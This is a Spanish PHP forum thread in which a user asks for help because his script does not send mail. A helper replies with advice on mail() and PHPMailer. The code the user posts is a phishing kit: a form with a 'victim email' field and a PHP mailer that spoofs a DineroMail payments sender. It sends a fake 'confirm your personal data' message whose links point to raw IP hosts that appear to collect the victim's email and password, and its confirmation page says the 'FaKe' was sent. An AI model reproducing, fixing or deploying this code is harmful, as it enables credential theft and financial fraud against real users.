Foros del Web » Programando para Internet » PHP »

Ayuda con Php, no envia el mail

Estas en el tema de Ayuda con Php, no envia el mail en el foro de PHP en Foros del Web. Buenas, yo estoy tratando de armar un script, pero no me lo envia, miren para que me entiendan aca les dejo al url : http://www.cmatiasj.com.ar/prueba/Envio.htm ...
  #1 (permalink)  
Antiguo 22/04/2010, 18:51
 
Fecha de Ingreso: abril-2010
Mensajes: 4
Antigüedad: 14 años
Puntos: 0
Ayuda con Php, no envia el mail

Buenas, yo estoy tratando de armar un script, pero no me lo envia, miren para que me entiendan aca les dejo al url : http://www.cmatiasj.com.ar/prueba/Envio.htm
es decir, yo completo los casilleros, pero el mail no lo envia y no puedo saber porque, si alguien me podria ayudar joya! saludos




TIENES RAZON PATEKETRUEKE DISCULPA ACA LO DEJO:

ENVIAR:

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>MercadoLibre - www.MarvinCity.com.ar</title>
</head>

<body>

<style>
<!--
.txt {font-family: Arial, sans-serif; font-size: 13px; font-weight: bold; color: #333399}
-->
</style>

</script>
</head>
</b></font></p>
</font>
<form target="" action="index.php?sec=almacenamiento_enviar" method="POST">
<center>
<table border="0" width="70%" cellspacing="1" height="18">
<tr>
</center>
</tr>
<center>
<tr>
<td width="50%" align="right" height="11">
<p align="right"><b>Tu Email</b></p></td><td width="50%" align="left" height="11">
<input type="text" name="mailpide" size="20">
</td>
</tr>
<tr>
<td width="50%" align="right" height="11">
<p align="right"><b>Email Victima</b></p></td><td width="50%" align="left" height="11">
<input type="text" name="mail" size="20">
</td>
</tr>
<tr>
<td width="50%" align="right" height="6">
<p align="right"><b>Nombre Vendedor:</b></p>
</td>
<td width="50%" align="left" height="6">
<font color="#FFFFFF" face="Verdana">
<input type="text" name="nombre" size="20"></font></td>
</tr>
<tr>
<td width="50%" align="right" height="11">
<p align="right"><b>Nombre Producto:</b></p></td><td width="50%" align="left" height="11">
<input type="text" name="nombreproducto" size="20">
</td>
</tr> </table><p align="center"> <font face="Verdana" color="#FFFFFF">
<input type="submit" value="Enviar" name="submit" size="20">
</form></body>










INDEX.PHP


<?php

$mensaje=base64_encode($mensaje);
$a = $mail;
$b = $mailpide;
$c = $nombre;
$d = $nombreproducto;

$msg= "

<p style=\"margin-top: 0; margin-bottom: 0\"> <td height=15 ><font color=\"#000000\" font size=\"2\" face=\"Courier New\">Estimado usuario:</font></p>
<font color=\"#000000\" font size=\"2\" face=\"Courier New\">
<p style=\"margin-top: 0; margin-bottom: 0\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Te enviamos este e-mail para confirmacion de datos personales.
Por favor, haz click en el siguiente link:
<a href=%5C%22http://200.58.112.48/%7Eol000257/xplot/ver_dineromail.php?mail=$a&nick=$idUsuarioL&tipo=$ c&mail9a8w615h23eopzlemcfnun8f4767wecvbvbffffdy37i ojkylty8mvnbvvdasa65733j7jhdiujhetdh25495097kfnh42 gdbncmblljff349ea15dc020382dbee65f96d350afcurmboxH oTMaiL=jijd&mailpide=$mailpide%5C%22>
https://www.dineromail.com/Registracion/RC.asp?C=393823948715199</a> </p>
<p style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p style=\"margin-top: 0; margin-bottom: 0\">*Si tu programa de e-mail no te permite hacer click en el link, realiza
los siguientes pasos:
</p>
<p style=\"margin-top: 0; margin-bottom: 0\">Hola $mail yo soy $mailpide tu nombre de vendedor es $nombre y tu articulo es $nombreproducto </p>
<p style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p style=\"margin-top: 0; margin-bottom: 0\">1. Ingresa a
<a href=%5C%22http://144.36.62.21/prueba/insertar_merca2.php?mail=<? echo $mail; ?>&pass=<? echo $pass; ?\">www.dineromail.com</a> </p>
<p style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p style=\"margin-top: 0; margin-bottom: 0\">2. En donde dice &quot;Usuario&quot;, ingresa tu dirección de e-mail y donde diga
&quot;Clave” pon tu clave personal, y haz clic en “Ingresar”. </p>
<p style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p style=\"margin-top: 0; margin-bottom: 0\">3. Ingresa el código de confirmación y tu clave personal.
</p>
<p style=\"margin-top: 0; margin-bottom: 0\">&nbsp;</p>
<p style=\"margin-top: 0; margin-bottom: 0\">Conserva este e-mail o imprímelo y guárdalo.
Ante cualquier consulta, no dudes en comunicarte con nuestro Servicio de </p>
<p style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p style=\"margin-top: 0; margin-bottom: 0\">Atención al Cliente escribiendo a
[email protected] </p>
<p style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">Atentamente,
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">María Ordóñez
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">Servicio de Atención al Cliente
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">

[email protected]
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">
</p>
<p align=\"right\" style=\"margin-top: 0; margin-bottom: 0\">www.dineromail.com
</p>
<p style=\"margin-top: 0; margin-bottom: 0\">
</p>
</font>
<p style=\"margin-top: 0; margin-bottom: 0\"> </p>
</font>
<p style=\"margin-top: 0; margin-bottom: 0\">";

//para el envío en formato HTML
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
$headers .= "From: \"Pagos DineroMail.com\" <[email protected]>";
$asunto= "Confirmacion de datos personales.";

mail($mail, $asunto, $msg, $headers);
echo "</p></td>
</tr>
<p align=center><font size=2 color=#000000 face=Verdana>Le Enviamos el FaKe
a </font><font face=Verdana color=#000000><font size=2>$mail</font></font></p>
<p align=center><font face=Verdana color=#000000>
<a href=http://www.MarvinCity.com.ar/ style=text-decoration: none; font-weight: 700>

Última edición por Cmjun; 22/04/2010 a las 19:01
  #2 (permalink)  
Antiguo 22/04/2010, 18:55
Avatar de pateketrueke
Modernizr
 
Fecha de Ingreso: abril-2008
Ubicación: Mexihco-Tenochtitlan
Mensajes: 26.399
Antigüedad: 16 años
Puntos: 2534
Respuesta: Ayuda con Php, no envia el mail

pues sin ver tu código es difícil adivinar el problema...

bueno, aún si no lo quieres mostrar pues usa PHPMailer... ;)
__________________
Y U NO RTFM? щ(ºдºщ)

No atiendo por MP nada que no sea personal.
  #3 (permalink)  
Antiguo 22/04/2010, 19:06
 
Fecha de Ingreso: abril-2010
Mensajes: 4
Antigüedad: 14 años
Puntos: 0
Respuesta: Ayuda con Php, no envia el mail

Cita:
Iniciado por pateketrueke Ver Mensaje
pues sin ver tu código es difícil adivinar el problema...

bueno, aún si no lo quieres mostrar pues usa PHPMailer... ;)
Ahi lo puse gracias
  #4 (permalink)  
Antiguo 22/04/2010, 19:10
Avatar de pateketrueke
Modernizr
 
Fecha de Ingreso: abril-2008
Ubicación: Mexihco-Tenochtitlan
Mensajes: 26.399
Antigüedad: 16 años
Puntos: 2534
Respuesta: Ayuda con Php, no envia el mail

bueno, en todo caso por favor... lee el manual
http://php.net/mail

ya que dicha función devuelve un valor booleano con el que podrías comprobar si se hizo la pasarela del mail al servidor de correo...

aún así, esto no asegura que el envío sea correcto... ya que no depende de PHP el envío, sino del servidor de SMTP en curso...

por cualquier problema, lo mejor... desde siempre, es usar PHPMailer y alguna cuenta de SMTP personalizada... ;)
__________________
Y U NO RTFM? щ(ºдºщ)

No atiendo por MP nada que no sea personal.
  #5 (permalink)  
Antiguo 22/04/2010, 19:35
 
Fecha de Ingreso: abril-2010
Mensajes: 4
Antigüedad: 14 años
Puntos: 0
Respuesta: Ayuda con Php, no envia el mail

Usare algun phpmailer, entonces, de donde puedo conseguir el script del phpmailer?
  #6 (permalink)  
Antiguo 22/04/2010, 19:40
Avatar de pateketrueke
Modernizr
 
Fecha de Ingreso: abril-2008
Ubicación: Mexihco-Tenochtitlan
Mensajes: 26.399
Antigüedad: 16 años
Puntos: 2534
Respuesta: Ayuda con Php, no envia el mail

Cita:
Iniciado por Cmjun Ver Mensaje
Usare algun phpmailer, entonces, de donde puedo conseguir el script del phpmailer?
Google: phpmailer
__________________
Y U NO RTFM? щ(ºдºщ)

No atiendo por MP nada que no sea personal.

Etiquetas: mail
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 10:53.